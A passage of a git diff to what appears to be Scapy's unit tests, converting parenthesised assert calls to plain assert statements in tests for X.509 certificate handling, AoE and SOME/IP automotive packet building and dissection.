b"\x0cm\x8a\x8f\xae`o\xcdC=\xfea\xf4\xff\xf0i\xfe\xa3!\xfd\xa5=*\x99?\x08!\x03A~\xa3-B\xe8\xca\xaf\xb4H|\xa3\x98\xe9\xd5U\xfdL\xb1\x9c\xd8\xb2{\xa1/\xfcr\x8c\xa7\xd3\xa9%\xde\x13\xa8\xf6\xc6<\xc7\xdb\xe3\xa62\xeb\xe9?\xe5by\xc2\x9e\xad\xec\x92:\x14\xd96\xa8\xc0+\xea8\'{=\x91$\xdf\xed\xe1+eF8\x9fI\x1f\xa1\xcb4s\xd1#\xdf\xa11\x88o\x050i Hg\x0690\xe6\xe8?\\<:k\x94\x82\x91\x0f\x06\xc7>ZQ\xc2\xcdn\xdb\xf4\x9d\x7f!\xa9>\xe8\xea\xb3\xd83]\x8d\x90\xd4\xa0b\xe6\xe6$d[\xe4\xb4 |W\xb2t\x8c\xb2\xd5>>+\xf1\xa6W\'\xaf\xc2CU\x82\x13\xc4\x0b\xc4vD*\xc3\xef\xa6s\nQ\xe6\rS@B\xd2\xa4V\xdc\xd1D\x7f\x00\xaa\xac\xac\x96i\xf1kg*\xe9*\x90a@\xc8uDy\x16\xe2\x03\xd1\x9fa\xe2s\xdb\xees\xa4\x8cna\xba\xdaE\x006&\xa4") +assert s == b"\x0cm\x8a\x8f\xae`o\xcdC=\xfea\xf4\xff\xf0i\xfe\xa3!\xfd\xa5=*\x99?\x08!\x03A~\xa3-B\xe8\xca\xaf\xb4H|\xa3\x98\xe9\xd5U\xfdL\xb1\x9c\xd8\xb2{\xa1/\xfcr\x8c\xa7\xd3\xa9%\xde\x13\xa8\xf6\xc6<\xc7\xdb\xe3\xa62\xeb\xe9?\xe5by\xc2\x9e\xad\xec\x92:\x14\xd96\xa8\xc0+\xea8\'{=\x91$\xdf\xed\xe1+eF8\x9fI\x1f\xa1\xcb4s\xd1#\xdf\xa11\x88o\x050i Hg\x0690\xe6\xe8?\\<:k\x94\x82\x91\x0f\x06\xc7>ZQ\xc2\xcdn\xdb\xf4\x9d\x7f!\xa9>\xe8\xea\xb3\xd83]\x8d\x90\xd4\xa0b\xe6\xe6$d[\xe4\xb4 |W\xb2t\x8c\xb2\xd5>>+\xf1\xa6W\'\xaf\xc2CU\x82\x13\xc4\x0b\xc4vD*\xc3\xef\xa6s\nQ\xe6\rS@B\xd2\xa4V\xdc\xd1D\x7f\x00\xaa\xac\xac\x96i\xf1kg*\xe9*\x90a@\xc8uDy\x16\xe2\x03\xd1\x9fa\xe2s\xdb\xees\xa4\x8cna\xba\xdaE\x006&\xa4" x_pub = PubKey((x._pubExp, x._modulus, x._modulusLen)) x_pub._legacy_verify_md5_sha1(m, s) @@ -312,11 +312,11 @@ x.issuer_str == '/C=FR/ST=Paris/L=Paris/O=Mushroom Corp./OU=Mushroom VPN Service x.subject_str == '/C=FR/ST=Paris/L=Paris/O=Mushroom Corp./OU=Mushroom VPN Services/CN=IKEv2 X.509 Test certificate/emailAddress=ikev2-test@mushroom.corp' = Cert class : Checking start date extraction in simple and tuple formats -assert(x.notBefore_str_simple == '07/13/06') +assert x.notBefore_str_simple == '07/13/06' x.notBefore == (2006, 7, 13, 7, 38, 59, 3, 194, -1) = Cert class : Checking end date extraction in simple and tuple formats -assert(x.notAfter_str_simple == '03/30/26') +assert x.notAfter_str_simple == '03/30/26' x.notAfter == (2026, 3, 30, 7, 38, 59, 0, 89, -1) = Cert class : test remainingDays @@ -324,16 +324,16 @@ assert abs(x.remainingDays("02/12/11")) > 5000 assert abs(x.remainingDays("Feb 12 10:00:00 2011 Paris, Madrid")) > 1 = Cert class : Checking RSA public key -assert(type(x.pubKey) is PubKeyRSA) +assert type(x.pubKey) is PubKeyRSA x_pubNum = x.pubKey.pubkey.public_numbers() -assert(x_pubNum.n == 19231328316532061413420367242571475005688288081144416166988378525696075445024135424022026378563116068168327239354659928492979285632474448448624869172454076124150405352043642781483254546569202103296262513098482624188672299255268092629150366527784294463900039290024710152521604731213565912934889752122898104556895316819303096201441834849255370122572613047779766933573375974464479123135292080801384304131606933504677232323037116557327478512106367095125103346134248056463878553619525193565824925835325216545121044922690971718737998420984924512388011040969150550056783451476150234324593710633552558175109683813482739004163) +assert x_pubNum.n == 19231328316532061413420367242571475005688288081144416166988378525696075445024135424022026378563116068168327239354659928492979285632474448448624869172454076124150405352043642781483254546569202103296262513098482624188672299255268092629150366527784294463900039290024710152521604731213565912934889752122898104556895316819303096201441834849255370122572613047779766933573375974464479123135292080801384304131606933504677232323037116557327478512106367095125103346134248056463878553619525193565824925835325216545121044922690971718737998420984924512388011040969150550056783451476150234324593710633552558175109683813482739004163 x_pubNum.e == 0x10001 = Cert class : Checking extensions x.show() x.tbsCertificate.show() -assert(x.cA) -assert(x.authorityKeyID == b'\xf3\xd8N\xde\x90\xf7\xe6]\xd2\xce3\xcd\\V\x8co\x97\x141K') +assert x.cA +assert x.authorityKeyID == b'\xf3\xd8N\xde\x90\xf7\xe6]\xd2\xce3\xcd\\V\x8co\x97\x141K' not hasattr(x, "keyUsage") = Cert class : encrypt @@ -373,9 +373,9 @@ JjZ91eQ0hjkCMHw2U/Aw5WJjOpnitqM7mzT6HtoQknFekROn3aRukswy1vUhZscv """) = Cert class : Checking ECDSA public key -assert(type(y.pubKey) is PubKeyECDSA) +assert type(y.pubKey) is PubKeyECDSA pubkey = y.pubKey.pubkey -assert(pubkey.curve.name == 'secp384r1') +assert pubkey.curve.name == 'secp384r1' pubkey.public_numbers().x == 3987178688175281746349180015490646948656137448666005327832107126183726641822596270780616285891030558662603987311874 = Cert class : Checking ECDSA signature @@ -570,8 +570,8 @@ c2.isSelfSigned() and not c1.isSelfSigned() and not c0.isSelfSigned() c2.pubKey.verifyCert(c2) and c1.pubKey.verifyCert(c0) = Chain class : Checking chain construction -assert(len(Chain([c0, c1, c2])) == 3) -assert(len(Chain([c0], c1)) == 2) +assert len(Chain([c0, c1, c2])) == 3 +assert len(Chain([c0], c1)) == 2 len(Chain([c0], c2)) == 1 = Chain class : repr @@ -582,7 +582,7 @@ expected_repr = """__ /C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, In assert str(Chain([c0, c1, c2])) == expected_repr = Chain class : Checking chain verification -assert(Chain([], c0).verifyChain([c2], [c1])) +assert Chain([], c0).verifyChain([c2], [c1]) not Chain([c1]).verifyChain([c0]) = Chain class: Checking chain verification with file diff --git a/test/contrib/aoe.uts b/test/contrib/aoe.uts index 92d2c21ff25..c66bb93c52a 100644 --- a/test/contrib/aoe.uts +++ b/test/contrib/aoe.uts @@ -8,37 +8,37 @@ a = Ether(src="00:01:02:03:04:05") b = AOE() c = a / b -assert(c[Ether].type == 0x88a2) +assert c[Ether].type == 0x88a2 = Build - Check default p = AOE() -assert(hasattr(p, "q_conf_info")) +assert hasattr(p, "q_conf_info") = Build - Check Issue ATA command p = AOE() p.cmd = 0 -assert(hasattr(p, "i_ata_cmd")) +assert hasattr(p, "i_ata_cmd") = Build - Check Query Config Information p = AOE() p.cmd = 1 -assert(hasattr(p, "q_conf_info")) +assert hasattr(p, "q_conf_info") = Build - Check Mac Mask List p = AOE() p.cmd = 2 -assert(hasattr(p, "mac_m_list")) +assert hasattr(p, "mac_m_list") = Build - Check ReserveRelease p = AOE() p.cmd = 3 -assert(hasattr(p, "res_rel")) +assert hasattr(p, "res_rel") diff --git a/test/contrib/automotive/someip.uts b/test/contrib/automotive/someip.uts index 91fb8efdace..183b2202f1c 100644 --- a/test/contrib/automotive/someip.uts +++ b/test/contrib/automotive/someip.uts @@ -40,47 +40,47 @@ load_contrib("automotive.someip", globals_dict=globals()) p = SOMEIP() pstr = bytes(p) binstr = b"\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x01\x01\x00\x00" -assert(pstr == binstr) +assert pstr == binstr = Build with empty payload p.payload = Raw(b"") pstr = bytes(p) binstr = b"\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x01\x01\x00\x00" -assert(pstr == binstr) +assert pstr == binstr = Build with non-empty payload p.payload = Raw(b"\xde\xad\xbe\xef") pstr = bytes(p) binstr = b"\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x01\x00\x00\xde\xad\xbe\xef" -assert(pstr == binstr) +assert pstr == binstr = Dissect EVENT_ID packet p = SOMEIP(b"\x11\x11\x81\x11\x00\x00\x00\x04\x33\x33\x44\x44\x02\x03\x04\x05") -assert(p.srv_id == 0x1111) -assert(p.sub_id == 0x1) -assert(p.method_id == None) -assert(p.event_id == 0x0111) -assert(p.client_id == 0x3333) -assert(p.session_id == 0x4444) -assert(p.proto_ver == 0x02) -assert(p.iface_ver == 0x03) -assert(p.msg_type == 0x04) -assert(p.retcode == 0x05) +assert p.srv_id == 0x1111 +assert p.sub_id == 0x1 +assert p.method_id == None +assert p.event_id == 0x0111 +assert p.client_id == 0x3333 +assert p.session_id == 0x4444 +assert p.proto_ver == 0x02 +assert p.iface_ver == 0x03 +assert p.msg_type == 0x04 +assert p.retcode == 0x05 = Dissect METHOD_ID packet p = SOMEIP(b"\x11\x11\x01\x11\x00\x00\x00\x04\x33\x33\x44\x44\x02\x03\x04\x05") -assert(p.srv_id == 0x1111) -assert(p.sub_id == 0x0) -assert(p.method_id == 0x0111) -assert(p.event_id == None) -assert(p.client_id == 0x3333) -assert(p.session_id == 0x4444) -assert(p.proto_ver == 0x02) -assert(p.iface_ver == 0x03) -assert(p.msg_type == 0x04) -assert(p.retcode == 0x05) +assert p.srv_id == 0x1111 +assert p.sub_id == 0x0 +assert p.method_id == 0x0111 +assert p.event_id == None +assert p.client_id == 0x3333 +assert p.session_id == 0x4444 +assert p.proto_ver == 0x02 +assert p.iface_ver == 0x03 +assert p.msg_type == 0x04 +assert p.retcode == 0x05 + SOME/IP-TP operation @@ -91,30 +91,30 @@ p.msg_type = 0x20 pstr = bytes(p) print(pstr) binstr = b'\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x01\x20\x00\x00\x00\x00\x00' -assert(pstr == binstr) +assert pstr == binstr p.more_seg = 1 pstr = bytes(p) binstr = b'\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x01\x20\x00\x00\x00\x00\x01' -assert(pstr == binstr) +assert pstr == binstr p.msg_type = 0x00 pstr = bytes(p) binstr = b'\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x01\x01\x00\x00' -assert(pstr == binstr) +assert pstr == binstr = Dissect TP p = SOMEIP(b'\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x01\x21\x00\x00\x00\x00\x01') -assert(p.msg_type == 0x21) -assert(p.more_seg == 1) -assert(p.len == 12) +assert p.msg_type == 0x21 +assert p.more_seg == 1 +assert p.len == 12 p.msg_type = 0x00 pstr = bytes(p) binstr = b"\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x01\x00\x00" -assert(pstr == binstr) +assert pstr == binstr = Build TP fragmented p = SOMEIP() @@ -123,18 +123,18 @@ p.add_payload(Raw("A"*1400)) f = p.fragment() -assert(f[0].len == 1404) -assert(f[1].len == 20) -assert(f[0].payload == Raw("A"*1392)) -assert(f[1].payload == Raw("A"*8)) -assert(f[0].more_seg == 1) -assert(f[1].more_seg == 0) +assert f[0].len == 1404 +assert f[1].len == 20 +assert f[0].payload == Raw("A"*1392) +assert f[1].payload == Raw("A"*8) +assert f[0].more_seg == 1 +assert f[1].more_seg == 0 + SD Entry Service = Check packet length on empty build p = SDEntry_Service() -assert(len(bytes(p)) == SDENTRY_OVERALL_LEN) +assert len(bytes(p)) == SDENTRY_OVERALL_LEN = Build 1 p = SDEntry_Service(type = SDENTRY_TYPE_SRV_OFFERSERVICE, @@ -143,33 +143,33 @@ p = SDEntry_Service(type = SDENTRY_TYPE_SRV_OFFERSERVICE, ttl = 0x666666, minor_ver = 0xdeadbeef) p_str = bytes(p) bin_str = b"\x01\x11\x22\x00\x33\x33\x44\x44\x55\x66\x66\x66\xde\xad\xbe\xef" -assert(p_str == bin_str) -assert(len(p_str) == SDENTRY_OVERALL_LEN) +assert p_str == bin_str +assert len(p_str) == SDENTRY_OVERALL_LEN = Build 2 p = SDEntry_Service(n_opt_1 = 0xf1, n_opt_2 = 0xf2) p_str = bytes(p) bin_str = b"\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -assert(p_str == bin_str) -assert(len(p_str) == SDENTRY_OVERALL_LEN) +assert p_str == bin_str +assert len(p_str) == SDENTRY_OVERALL_LEN = Dissect p = SDEntry_Service( b"\x01\x22\x33\x00\x44\x44\x55\x55\x66\x77\x77\x77\xde\xad\xbe\xef") -assert(p.type == SDENTRY_TYPE_SRV_OFFERSERVICE) -assert(p.index_1 == 0x22) -assert(p.index_2 == 0x33) -assert(p.srv_id == 0x4444) -assert(p.inst_id == 0x5555) -assert(p.major_ver == 0x66) -assert(p.ttl == 0x777777) -assert(p.minor_ver == 0xdeadbeef) +assert p.type == SDENTRY_TYPE_SRV_OFFERSERVICE +assert p.index_1 == 0x22 +assert p.index_2 == 0x33 +assert p.srv_id == 0x4444 +assert p.inst_id == 0x5555 +assert p.major_ver == 0x66 +assert p.ttl == 0x777777 +assert p.minor_ver == 0xdeadbeef + SD Entry Eventgroup = Check packet length on empty build p = SDEntry_EventGroup() -assert(len(bytes(p)) == SDENTRY_OVERALL_LEN) +assert len(bytes(p)) == SDENTRY_OVERALL_LEN = Build p = SDEntry_EventGroup(index_1 = 0x11, index_2 = 0x22, srv_id = 0x3333, @@ -177,69 +177,69 @@ p = SDEntry_EventGroup(index_1 = 0x11, index_2 = 0x22, srv_id = 0x3333, cnt = 0x7, eventgroup_id = 0x8888) p_str = bytes(p) bin_str = b"\x06\x11\x22\x00\x33\x33\x44\x44\x55\x66\x66\x66\x00\x07\x88\x88" -assert(p_str == bin_str) -assert(len(bytes(p)) == SDENTRY_OVERALL_LEN) +assert p_str == bin_str +assert len(bytes(p)) == SDENTRY_OVERALL_LEN = Dissect p = SDEntry_EventGroup( b"\x06\x11\x22\x00\x33\x33\x44\x44\x55\x66\x66\x66\x00\x07\x88\x88") -assert(p.index_1 == 0x11) -assert(p.index_2 == 0x22) -assert(p.srv_id == 0x3333) -assert(p.inst_id == 0x4444) -assert(p.major_ver == 0x55) -assert(p.ttl == 0x666666) -assert(p.cnt == 0x7) -assert(p.eventgroup_id == 0x8888) +assert p.index_1 == 0x11 +assert p.index_2 == 0x22 +assert p.srv_id == 0x3333 +assert p.inst_id == 0x4444 +assert p.major_ver == 0x55 +assert p.ttl == 0x666666 +assert p.cnt == 0x7 +assert p.eventgroup_id == 0x8888 + SD Flags = Build and check flags p = SD() p.set_flag("REBOOT", 1) -assert(p.flags == 0x80) +assert p.flags == 0x80 p.set_flag("REBOOT", 0) -assert(p.flags == 0x00) +assert p.flags == 0x00 p.set_flag("UNICAST", 1) -assert(p.flags == 0x40) +assert p.flags == 0x40 p.set_flag("UNICAST", 0) -assert(p.flags == 0x00) +assert p.flags == 0x00 p.set_flag("REBOOT", 1) p.set_flag("UNICAST", 1) -assert(p.flags == 0xc0) +assert p.flags == 0xc0 + SD Get SOME/IP Packet = Build empty p = SOMEIP() / SD() -assert(len(bytes(p)) == SOMEIP._OVERALL_LEN_NOPAYLOAD + 12) +assert len(bytes(p)) == SOMEIP._OVERALL_LEN_NOPAYLOAD + 12 = Verify constants against spec TR_SOMEIP_00250 -assert(SD.SOMEIP_MSGID_SRVID == 0xffff) -assert(SD.SOMEIP_MSGID_SUBID == 0x1) -assert(SD.SOMEIP_MSGID_EVENTID == 0x0100) -assert(SD.SOMEIP_CLIENT_ID == 0x0000) -assert(SD.SOMEIP_MINIMUM_SESSION_ID == 0x0001) -assert(SD.SOMEIP_PROTO_VER == 0x01) -assert(SD.SOMEIP_IFACE_VER == 0x01) -assert(SD.SOMEIP_MSG_TYPE == 0x02) -assert(SD.SOMEIP_RETCODE == 0x00) +assert SD.SOMEIP_MSGID_SRVID == 0xffff +assert SD.SOMEIP_MSGID_SUBID == 0x1 +assert SD.SOMEIP_MSGID_EVENTID == 0x0100 +assert SD.SOMEIP_CLIENT_ID == 0x0000 +assert SD.SOMEIP_MINIMUM_SESSION_ID == 0x0001 +assert SD.SOMEIP_PROTO_VER == 0x01 +assert SD.SOMEIP_IFACE_VER == 0x01 +assert SD.SOMEIP_MSG_TYPE == 0x02 +assert SD.SOMEIP_RETCODE == 0x00 = check that values are bound -assert(p[SOMEIP].srv_id == SD.SOMEIP_MSGID_SRVID) -assert(p[SOMEIP].sub_id == SD.SOMEIP_MSGID_SUBID) -assert(p[SOMEIP].event_id == SD.SOMEIP_MSGID_EVENTID) -assert(p[SOMEIP].client_id == SD.SOMEIP_CLIENT_ID) -assert(p[SOMEIP].session_id != 0x0000) -assert(p[SOMEIP].session_id >= SD.SOMEIP_MINIMUM_SESSION_ID) -assert(p[SOMEIP].proto_ver == SD.SOMEIP_PROTO_VER) -assert(p[SOMEIP].iface_ver == SD.SOMEIP_IFACE_VER) -assert(p[SOMEIP].msg_type == SD.SOMEIP_MSG_TYPE) -assert(p[SOMEIP].retcode == SD.SOMEIP_RETCODE) +assert p[SOMEIP].srv_id == SD.SOMEIP_MSGID_SRVID +assert p[SOMEIP].sub_id == SD.SOMEIP_MSGID_SUBID +assert p[SOMEIP].event_id == SD.SOMEIP_MSGID_EVENTID +assert p[SOMEIP].client_id == SD.SOMEIP_CLIENT_ID +assert p[SOMEIP].session_id != 0x0000 +assert p[SOMEIP].session_id >= SD.SOMEIP_MINIMUM_SESSION_ID +assert p[SOMEIP].proto_ver == SD.SOMEIP_PROTO_VER +assert p[SOMEIP].iface_ver == SD.SOMEIP_IFACE_VER +assert p[SOMEIP].msg_type == SD.SOMEIP_MSG_TYPE +assert p[SOMEIP].retcode == SD.SOMEIP_RETCODE # FIXME: Service Discovery messages shell be transported over UDP # (TR_SOMEIP_00248) @@ -250,28 +250,28 @@ assert(p[SOMEIP].retcode == SD.SOMEIP_RETCODE) = Check length of package without entries nor options p = SD() -assert(len(bytes(p)) == 12) +assert len(bytes(p)) == 12 = Check entries to array and size check p.set_entryArray([SDEntry_Service(), SDEntry_EventGroup()]) -assert(struct.unpack("!L", bytes(p)[4:8])[0] == 32) +assert struct.unpack("!L", bytes(p)[4:8])[0] == 32 p.set_entryArray([]) -assert(struct.unpack("!L", bytes(p)[4:8])[0] == 0) +assert struct.unpack("!L", bytes(p)[4:8])[0] == 0 = Check Options to array and size check p.set_optionArray([SDOption_IP4_EndPoint(), SDOption_IP4_EndPoint()]) -assert(struct.unpack("!L", bytes(p)[8:12])[0] == 24) +assert struct.unpack("!L", bytes(p)[8:12])[0] == 24 p.set_optionArray([]) -assert(struct.unpack("!L", bytes(p)[8:12])[0] == 0) +assert struct.unpack("!L", bytes(p)[8:12])[0] == 0 = Check Entries & Options to array and size check p.set_entryArray([SDEntry_Service(), SDEntry_EventGroup()]) p.set_optionArray([SDOption_IP4_EndPoint(), SDOption_IP4_EndPoint()]) -assert(struct.unpack("!L", bytes(p)[4:8])[0] == 32) -assert(struct.unpack("!L", bytes(p)[40:44])[0] == 24) +assert struct.unpack("!L", bytes(p)[4:8])[0] == 32 +assert struct.unpack("!L", bytes(p)[40:44])[0] == 24 + Git issue 2348: SOME/IP-SD Entry-Array is broken by building it from RAW @@ -294,25 +294,25 @@ ea2.eventgroup_id = 0x1357 sd1 = SD() sd1.set_entryArray([ea1]) -# this is computed on build, but we need it sooner for the assert() +# this is computed on build, but we need it sooner for the assert sd1.len_entry_array = 16 sd1.len_option_array = 0 -assert(sd1.show(dump=True) == SD(sd1.build()).show(dump=True)) +assert sd1.show(dump=True) == SD(sd1.build()).show(dump=True) = Double SD entry sd2 = SD() sd2.set_entryArray([ea2,ea1]) -# this is computed on build, but we need it sooner for the assert() +# this is computed on build, but we need it sooner for the assert sd2.len_entry_array = 32 sd2.len_option_array = 0 -assert(sd2.show(dump=True) == SD(sd2.build()).show(dump=True)) +assert sd2.show(dump=True) == SD(sd2.build()).show(dump=True) = Flipped double SD entry # flip the order sd2.set_entryArray([ea1,ea2]) -assert(sd2.show(dump=True) == SD(sd2.build()).show(dump=True)) +assert sd2.show(dump=True) == SD(sd2.build()).show(dump=True) @@ -320,27 +320,27 @@ assert(sd2.show(dump=True) == SD(sd2.build()).show(dump=True)) + SD Options (individual) = Verifying constants against spec -assert(SDOPTION_CFG_TYPE == 0x01) -assert(SDOPTION_LOADBALANCE_TYPE == 0x02) -assert(SDOPTION_LOADBALANCE_LEN == 0x05) -assert(SDOPTION_IP4_ENDPOINT_TYPE == 0x04) -assert(SDOPTION_IP4_ENDPOINT_LEN == 0x0009) -assert(SDOPTION_IP4_MCAST_TYPE == 0x14) -assert(SDOPTION_IP4_MCAST_LEN == 0x0009) -assert(SDOPTION_IP4_SDENDPOINT_TYPE == 0x24) -assert(SDOPTION_IP4_SDENDPOINT_LEN == 0x0009) -assert(SDOPTION_IP6_ENDPOINT_TYPE == 0x06) -assert(SDOPTION_IP6_ENDPOINT_LEN == 0x0015) -assert(SDOPTION_IP6_MCAST_TYPE == 0x16) -assert(SDOPTION_IP6_MCAST_LEN == 0x0015) -assert(SDOPTION_IP6_SDENDPOINT_TYPE == 0x26) -assert(SDOPTION_IP6_SDENDPOINT_LEN == 0x0015) +assert SDOPTION_CFG_TYPE == 0x01 +assert SDOPTION_LOADBALANCE_TYPE == 0x02 +assert SDOPTION_LOADBALANCE_LEN == 0x05 +assert SDOPTION_IP4_ENDPOINT_TYPE == 0x04 +assert SDOPTION_IP4_ENDPOINT_LEN == 0x0009 +assert SDOPTION_IP4_MCAST_TYPE == 0x14 +assert SDOPTION_IP4_MCAST_LEN == 0x0009 +assert SDOPTION_IP4_SDENDPOINT_TYPE == 0x24 +assert SDOPTION_IP4_SDENDPOINT_LEN == 0x0009 +assert SDOPTION_IP6_ENDPOINT_TYPE == 0x06 +assert SDOPTION_IP6_ENDPOINT_LEN == 0x0015 +assert SDOPTION_IP6_MCAST_TYPE == 0x16 +assert SDOPTION_IP6_MCAST_LEN == 0x0015 +assert SDOPTION_IP6_SDENDPOINT_TYPE == 0x26 +assert SDOPTION_IP6_SDENDPOINT_LEN == 0x0015 ### SDOption_Config = SDOption_Config: Verify make_string() method from dict data = { "hello": "world" } out = SDOption_Config.make_string(data) -assert(out == b"\x0bhello=world\x00") +assert out == b"\x0bhello=world\x00" = SDOption_Config: Verify make_string() method from list data = [ @@ -349,349 +349,349 @@ data = [ ("123", "456") ] out = SDOption_Config.make_string(data) -assert(out == b"\x03x=y\x07abc=def\x07123=456\x00") +assert out == b"\x03x=y\x07abc=def\x07123=456\x00" = SDOption_Config: Build and dissect empty opt = SDOption_Config() optraw = opt.build() -assert(optraw == b"\x00\x02\x01\x00\x00") +assert optraw == b"\x00\x02\x01\x00\x00" opt = SDOption_Config(optraw) -assert(opt.len == 0x2) -assert(opt.type == SDOPTION_CFG_TYPE) -assert(opt.res_hdr == 0x0) -assert(opt.cfg_str == b"\x00") +assert opt.len == 0x2 +assert opt.type == SDOPTION_CFG_TYPE +assert opt.res_hdr == 0x0 +assert opt.cfg_str == b"\x00" = SDOption_Config: Build and dissect spec example tststr = b"\x05abc=x\x07def=123\x00" opt = SDOption_Config(cfg_str=tststr) optraw = opt.build() -assert(optraw == b"\x00\x10\x01\x00" + tststr) +assert optraw == b"\x00\x10\x01\x00" + tststr opt = SDOption_Config(optraw) -assert(opt.len == 0x10) -assert(opt.type == SDOPTION_CFG_TYPE) -assert(opt.res_hdr == 0x00) -assert(opt.cfg_str == tststr) +assert opt.len == 0x10 +assert opt.type == SDOPTION_CFG_TYPE +assert opt.res_hdr == 0x00 +assert opt.cfg_str == tststr = SDOption_Config: Build and dissect fully populated tststr = b"abcdefghijklmnopqrstuvwxyz" opt = SDOption_Config(len=0x1234, type=0x56, res_hdr=0x78, cfg_str=tststr) optraw = opt.build() -assert(optraw == b"\x12\x34\x56\x78" + tststr) +assert optraw == b"\x12\x34\x56\x78" + tststr opt = SDOption_Config(optraw) -assert(opt.len == 0x1234) -assert(opt.type == 0x56) -assert(opt.res_hdr == 0x78) -assert(opt.cfg_str == tststr) +assert opt.len == 0x1234 +assert opt.type == 0x56 +assert opt.res_hdr == 0x78 +assert opt.cfg_str == tststr ### SDOption_LoadBalance = SDOption_LoadBalance: Build and dissect empty opt = SDOption_LoadBalance() optraw = opt.build() -assert(optraw == b"\x00\x05\x02\x00\x00\x00\x00\x00") +assert optraw == b"\x00\x05\x02\x00\x00\x00\x00\x00" opt = SDOption_LoadBalance(optraw) -assert(opt.len == SDOPTION_LOADBALANCE_LEN) -assert(opt.type == SDOPTION_LOADBALANCE_TYPE) -assert(opt.res_hdr == 0x0) -assert(opt.priority == 0x0) -assert(opt.weight == 0x0) +assert opt.len == SDOPTION_LOADBALANCE_LEN +assert opt.type == SDOPTION_LOADBALANCE_TYPE +assert opt.res_hdr == 0x0 +assert opt.priority == 0x0 +assert opt.weight == 0x0 = SDOption_LoadBalance: Build and dissect example opt = SDOption_LoadBalance(priority=0x1234, weight=0x5678) optraw = opt.build() -assert(optraw == b"\x00\x05\x02\x00\x12\x34\x56\x78") +assert optraw == b"\x00\x05\x02\x00\x12\x34\x56\x78" opt = SDOption_LoadBalance(optraw) -assert(opt.len == SDOPTION_LOADBALANCE_LEN) -assert(opt.type == SDOPTION_LOADBALANCE_TYPE) -assert(opt.res_hdr == 0x00) -assert(opt.priority == 0x1234) -assert(opt.weight == 0x5678) +assert opt.len == SDOPTION_LOADBALANCE_LEN +assert opt.type == SDOPTION_LOADBALANCE_TYPE +assert opt.res_hdr == 0x00 +assert opt.priority == 0x1234 +assert opt.weight == 0x5678 = SDOption_LoadBalance: Build and dissect fully populated opt = SDOption_LoadBalance(len=0x1234, type=0x56, res_hdr=0x78, priority=0x9abc, weight=0xdef0) optraw = opt.build() -assert(optraw == b"\x12\x34\x56\x78\x9a\xbc\xde\xf0") +assert optraw == b"\x12\x34\x56\x78\x9a\xbc\xde\xf0" opt = SDOption_LoadBalance(optraw) -assert(opt.len == 0x1234) -assert(opt.type == 0x56) -assert(opt.res_hdr == 0x78) -assert(opt.priority == 0x9abc) -assert(opt.weight == 0xdef0) +assert opt.len == 0x1234 +assert opt.type == 0x56 +assert opt.res_hdr == 0x78 +assert opt.priority == 0x9abc +assert opt.weight == 0xdef0 ### SDOption_IP4_EndPoint = SDOption_IP4_EndPoint: Build and dissect empty opt = SDOption_IP4_EndPoint() optraw = opt.build() -assert(optraw == b"\x00\x09\x04\x00\x00\x00\x00\x00\x00\x11\x00\x00") +assert optraw == b"\x00\x09\x04\x00\x00\x00\x00\x00\x00\x11\x00\x00" opt = SDOption_IP4_EndPoint(optraw) -assert(opt.len == SDOPTION_IP4_ENDPOINT_LEN) -assert(opt.type == SDOPTION_IP4_ENDPOINT_TYPE) -assert(opt.res_hdr == 0x0) -assert(opt.addr == "0.0.0.0") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x11) -assert(opt.port == 0x0) +assert opt.len == SDOPTION_IP4_ENDPOINT_LEN +assert opt.type == SDOPTION_IP4_ENDPOINT_TYPE +assert opt.res_hdr == 0x0 +assert opt.addr == "0.0.0.0" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x11 +assert opt.port == 0x0 = SDOption_IP4_EndPoint: Build and dissect example opt = SDOption_IP4_EndPoint(addr = "192.168.123.45", l4_proto = "TCP", port = 0x1234) optraw = opt.build() -assert(optraw == b"\x00\x09\x04\x00\xc0\xa8\x7b\x2d\x00\x06\x12\x34") +assert optraw == b"\x00\x09\x04\x00\xc0\xa8\x7b\x2d\x00\x06\x12\x34" opt = SDOption_IP4_EndPoint(optraw) -assert(opt.len == SDOPTION_IP4_ENDPOINT_LEN) -assert(opt.type == SDOPTION_IP4_ENDPOINT_TYPE) -assert(opt.res_hdr == 0x00) -assert(opt.addr == "192.168.123.45") -assert(opt.res_tail == 0x0) -assert(opt.l4_proto == 0x06) -assert(opt.port == 0x1234) +assert opt.len == SDOPTION_IP4_ENDPOINT_LEN +assert opt.type == SDOPTION_IP4_ENDPOINT_TYPE +assert opt.res_hdr == 0x00 +assert opt.addr == "192.168.123.45" +assert opt.res_tail == 0x0 +assert opt.l4_proto == 0x06 +assert opt.port == 0x1234 = SDOption_IP4_EndPoint: Build and dissect fully populated opt = SDOption_IP4_EndPoint(len=0x1234, type=0x56, res_hdr=0x78, addr = "11.22.33.44", res_tail = 0x9a, l4_proto = 0xbc, port = 0xdef0) optraw = opt.build() -assert(optraw == b"\x12\x34\x56\x78\x0b\x16\x21\x2c\x9a\xbc\xde\xf0") +assert optraw == b"\x12\x34\x56\x78\x0b\x16\x21\x2c\x9a\xbc\xde\xf0" opt = SDOption_IP4_EndPoint(optraw) -assert(opt.len == 0x1234) -assert(opt.type == 0x56) -assert(opt.res_hdr == 0x78) -assert(opt.addr == "11.22.33.44") -assert(opt.res_tail == 0x9a) -assert(opt.l4_proto == 0xbc) -assert(opt.port == 0xdef0) +assert opt.len == 0x1234 +assert opt.type == 0x56 +assert opt.res_hdr == 0x78 +assert opt.addr == "11.22.33.44" +assert opt.res_tail == 0x9a +assert opt.l4_proto == 0xbc +assert opt.port == 0xdef0 ### SDOption_IP4_Multicast = SDOption_IP4_Multicast: Build and dissect empty opt = SDOption_IP4_Multicast() optraw = opt.build() -assert(optraw == b"\x00\x09\x14\x00\x00\x00\x00\x00\x00\x11\x00\x00") +assert optraw == b"\x00\x09\x14\x00\x00\x00\x00\x00\x00\x11\x00\x00" opt = SDOption_IP4_Multicast(optraw) -assert(opt.len == 